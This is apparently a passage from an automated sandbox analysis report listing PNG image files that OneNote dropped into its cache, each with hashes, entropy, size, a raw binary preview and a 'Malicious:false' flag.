                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002L.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002M.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002N.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002O.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002P.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002Q.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002R.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002S.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002T.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002U.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002V.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000030.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
